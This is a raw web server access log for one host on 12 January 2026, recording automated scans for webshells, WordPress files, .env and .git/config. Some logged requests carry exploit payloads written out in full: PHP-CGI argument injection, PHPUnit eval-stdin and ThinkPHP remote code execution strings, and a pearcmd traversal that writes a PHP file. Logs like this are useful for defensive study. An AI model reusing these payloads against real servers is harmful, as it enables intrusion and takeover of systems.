"/pow.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:40 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/dop.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:41 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-content/plugins/" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:41 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/lv.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:41 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/MTOS/byp.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:41 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-includes/assets/index.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:41 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-includes/customize/index.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:42 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/pkmoj.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:42 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/uploads/upload2.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:42 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/hehehehe.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:42 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/fss.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:42 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wwr.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:43 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//content.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:43 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-content/kj.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:43 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/update/wpupex.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:43 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//install.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:43 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/kopyw.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:43 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/cong.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:44 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-includes/css/about.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:44 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/shop.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:44 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/lla.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:44 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/nok.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:44 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-content/uploads/2024/dodo.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:45 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ker.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:45 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//dropdown.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:45 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-includes/images/403.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:45 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/~elliotimformatiq/sxp.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:45 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/qfvqu.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:46 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/crt.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:46 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/2eaa2.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:46 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-includes/css/" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:46 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/has.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:46 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/nka.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:47 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:47 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/dropdown.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:47 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-includes/Text/wp-login.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:47 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//cgi-bin/wp-login.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:47 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/jvcpa.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:48 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/zil.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:48 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/images/uploadform.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:48 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/system_log.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:48 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wordpress/clo.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:48 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/.well-known/zip.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:49 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ar.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:49 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/shelp.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:49 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wordpress/yts.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:49 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/file.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:49 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-admin/images/Mhbgf.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:49 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-admin/maint/" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:50 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/first.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:50 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//admin/function.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:50 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/404.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:50 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp/wp-includes//index.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:12:50 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/museu/yhweq.php" [Client 20.239.71.136] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:18:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 64.62.197.212] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:08:19:44 +0000] 400 - - http localhost "-" [Client 80.94.95.75] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:08:20:35 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:08:21:15 +0000] 404 - GET http 92.249.249.197 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:08:28:41 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 164.90.145.163] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[12/Jan/2026:08:28:41 +0000] 404 - GET http 92.249.249.197 "/.git/config" [Client 164.90.145.163] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[12/Jan/2026:08:38:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:08:42:43 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:08:45:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 143.198.39.172] [Length 0] [Gzip -] "-" "-" +[12/Jan/2026:08:46:19 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:08:49:50 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[12/Jan/2026:08:49:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 193.142.147.209] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:08:50:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 95.214.55.71] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0" "-" +[12/Jan/2026:08:51:00 +0000] 404 - GET http 92.249.249.197 "/actuator/health" [Client 13.89.124.218] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[12/Jan/2026:08:55:13 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 87.98.188.238] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:08:55:13 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 87.98.188.238] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:08:55:13 +0000] 404 - POST http 92.249.249.197 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:14 +0000] 405 - POST http 92.249.249.197 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 87.98.188.238] [Length 154] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:14 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:14 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:15 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:15 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:15 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:15 +0000] 404 - GET http 92.249.249.197 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:15 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:16 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:16 +0000] 404 - GET http 92.249.249.197 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:16 +0000] 404 - GET http 92.249.249.197 "/phpunit/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:16 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:16 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:17 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:17 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:17 +0000] 404 - GET http 92.249.249.197 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:17 +0000] 404 - GET http 92.249.249.197 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:18 +0000] 404 - GET http 92.249.249.197 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:18 +0000] 404 - GET http 92.249.249.197 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:18 +0000] 404 - GET http 92.249.249.197 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:18 +0000] 404 - GET http 92.249.249.197 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:19 +0000] 404 - GET http 92.249.249.197 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:19 +0000] 404 - GET http 92.249.249.197 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:19 +0000] 404 - GET http 92.249.249.197 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:20 +0000] 404 - GET http 92.249.249.197 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:20 +0000] 404 - GET http 92.249.249.197 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:20 +0000] 404 - GET http 92.249.249.197 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:21 +0000] 404 - GET http 92.249.249.197 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:21 +0000] 404 - GET http 92.249.249.197 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:21 +0000] 404 - GET http 92.249.249.197 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:21 +0000] 404 - GET http 92.249.249.197 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:22 +0000] 404 - GET http 92.249.249.197 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:22 +0000] 404 - GET http 92.249.249.197 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:22 +0000] 404 - GET http 92.249.249.197 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:22 +0000] 404 - GET http 92.249.249.197 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:23 +0000] 404 - GET http 92.249.249.197 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:23 +0000] 404 - GET http 92.249.249.197 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:23 +0000] 404 - GET http 92.249.249.197 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:23 +0000] 404 - GET http 92.249.249.197 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:24 +0000] 404 - GET http 92.249.249.197 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:24 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:24 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../tmp/index1" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:08:55:25 +0000] 404 - GET http 92.249.249.197 "/containers/json" [Client 87.98.188.238] [Length 150] [Gzip -] "libredtail-http" "-" +[12/Jan/2026:09:01:59 +0000] 404 - GET http 92.249.249.197 "/cgi-bin/luci/;stok=/locale" [Client 93.123.72.132] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:09:08:35 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:09:09:45 +0000] 200 - GET http 92.249.249.197 "/" [Client 46.19.137.194] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0" "-" +[12/Jan/2026:09:33:37 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:09:37:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:09:59:08 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:10:10:24 +0000] 200 - GET http 92.249.249.197 "/" [Client 103.252.89.75] [Length 1033] [Gzip -] "-" "-" +[12/Jan/2026:10:10:42 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:10:18:55 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 195.178.110.190] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36 OPR/36.0.2130.46" "-" +[12/Jan/2026:10:21:08 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 195.178.110.190] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 920) like Gecko" "-" +[12/Jan/2026:10:22:42 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 129.212.226.110] [Length 0] [Gzip -] "-" "-" +[12/Jan/2026:10:25:23 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:10:27:21 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:10:49:04 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:10:53:14 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[12/Jan/2026:10:53:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 193.142.147.209] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:11:14:44 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:11:17:56 +0000] 404 - GET http 92.249.249.197 "/backup/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:11:19:37 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:11:21:21 +0000] 200 - GET http 92.249.249.197 "/" [Client 143.255.240.195] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-" +[12/Jan/2026:11:39:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:11:42:16 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:11:43:10 +0000] 404 - HEAD http 92.249.249.197 "/invoker/EJBInvokerServlet" [Client 173.197.14.231] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36" "-" +[12/Jan/2026:11:43:10 +0000] 404 - HEAD http 92.249.249.197 "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" [Client 173.197.14.231] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36" "-" +[12/Jan/2026:11:43:11 +0000] 404 - HEAD http 92.249.249.197 "/invoker/JMXInvokerServlet" [Client 173.197.14.231] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36" "-" +[12/Jan/2026:11:43:12 +0000] 404 - HEAD http 92.249.249.197 "/web-console/ServerInfo.jsp" [Client 173.197.14.231] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36" "-" +[12/Jan/2026:12:05:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:12:14:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] 